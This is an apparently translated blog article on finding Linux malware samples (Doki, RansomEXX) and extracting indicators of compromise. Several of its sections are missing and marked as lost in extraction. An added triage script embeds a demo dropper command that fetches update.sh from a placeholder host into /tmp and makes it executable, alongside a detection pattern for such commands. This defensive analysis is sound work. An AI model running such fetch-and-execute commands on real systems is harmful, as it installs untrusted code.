OTUS expert Alexei Tsikunov invites everyone to the open day of the "Administrator Linux. Professional" course. During the webinar you can learn about the course and its training program in detail and ask your own questions.
Article author: Alexander Kolesnikov
For a long time, the main feature and pride of the Linux operating system was that there were "no viruses" for it that could disrupt the system or steal user data. Now that the end of 2020 has arrived, let's try to figure out whether this is still the case.
This article looks at an approach to finding malicious applications for the Linux operating system on public resources and analysing them at a surface level. The main goal is to extract indicators of compromise from the objects we find, which will help us detect an infection on our own machine.
Are there really no "viruses"?
[The opening statistics of this section did not survive extraction. The surviving fragments refer to a "Linux Malware TOP" ranking, name the two families examined below, Doki and RansomEXX, and mention VirusTotal and AlienVault as the public sources and md5 and sha1 hashes as the lookup keys. The two sha1 hashes:]
28E8E43BFEDC80242C1998594E0FA341A4000F52
CDC86D6B627A54C155C5E8A2EC790DCD5D40DA90
For dynamic analysis, Linux provides several tools that observe a program while it runs:
ltrace - traces the shared-library calls a process makes;
ptrace - the system call that lets one process inspect and control another, and the mechanism that debuggers and tracers are built on;
strace - traces the system calls a process makes and the signals it receives.
For static analysis, without running the sample:
readelf - prints the headers, sections and symbols of an ELF file;
objdump - dumps and disassembles object files, including their code sections;
file - identifies a file's type by its magic bytes (the "magic word");
strings - extracts the printable character sequences from a binary.
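As an added example that is not code from the article, the following POSIX shell script turns the two sha1 hashes quoted in the article into a local check and reproduces the strings-and-grep step on a sample; the sample file, the `example.invalid` URL and the indicator patterns other than update.sh are constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the original article: a static-triage helper
# built around the two sha1 indicators quoted in the article plus a
# `strings`-style scan. The sample file is constructed here, not real malware.

# sha1 indicators quoted in the article (upper-cased for comparison)
DOKI_SHA1="28E8E43BFEDC80242C1998594E0FA341A4000F52"
RANSOMEXX_SHA1="CDC86D6B627A54C155C5E8A2EC790DCD5D40DA90"

# Upper-case sha1 of a file (sha1sum prints lower-case hex).
sha1_of() {
    sha1sum "$1" | cut -d' ' -f1 | tr 'a-f' 'A-F'
}

# Map a sha1 in either case to the family named in the article, or "unknown".
classify_sha1() {
    case "$(printf '%s' "$1" | tr 'a-f' 'A-F')" in
        "$DOKI_SHA1")      echo "Doki" ;;
        "$RANSOMEXX_SHA1") echo "RansomEXX" ;;
        *)                 echo "unknown" ;;
    esac
}

# Printable runs of 4+ characters from the whole file, as `strings -a -n 4`
# prints them; falls back to tr/grep when binutils is not installed.
extract_strings() {
    if command -v strings >/dev/null 2>&1; then
        strings -a -n 4 "$1"
    else
        tr -c '[:print:]' '\n' < "$1" | grep -E '^.{4,}$'
    fi
}

# Grep the string table for the update.sh reference the article found in
# Doki, plus a few generic dropper patterns worth a second look.
flag_indicators() {
    extract_strings "$1" | grep -E 'update\.sh|/tmp/|curl |wget |chmod \+x' | sort -u
}

# Constructed sample: ELF magic, a few junk bytes and two embedded strings.
make_demo_sample() {
    f=$(mktemp)
    printf '\177ELF\002\001\001\000\000\000' > "$f"
    printf 'curl http://example.invalid/update.sh -o /tmp/update.sh\000' >> "$f"
    printf '\001\002\003chmod +x /tmp/update.sh\000' >> "$f"
    echo "$f"
}
```

Source the script and run `classify_sha1 "$(sha1_of FILE)"` followed by `flag_indicators FILE` on a file you want to check; a hash match names the family, and the flagged strings are the candidates for a closer look with readelf and objdump.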
Doki (sha1: 28E8E43BFEDC80242C1998594E0FA341A4000F52)
[The walkthrough of this sample did not survive extraction. The surviving fragments show that the sample is discussed in connection with Docker; that the author first runs strings on it, then turns to strace and ptrace, and then returns to the strings output and filters it with grep; and that the filtered output includes a reference to update.sh.]
RansomEXX (sha1: CDC86D6B627A54C155C5E8A2EC790DCD5D40DA90)
[The discussion of this sample's strings output did not survive extraction.]
[The conclusion, which mentions Windows and ends in a three-item list, did not survive extraction.]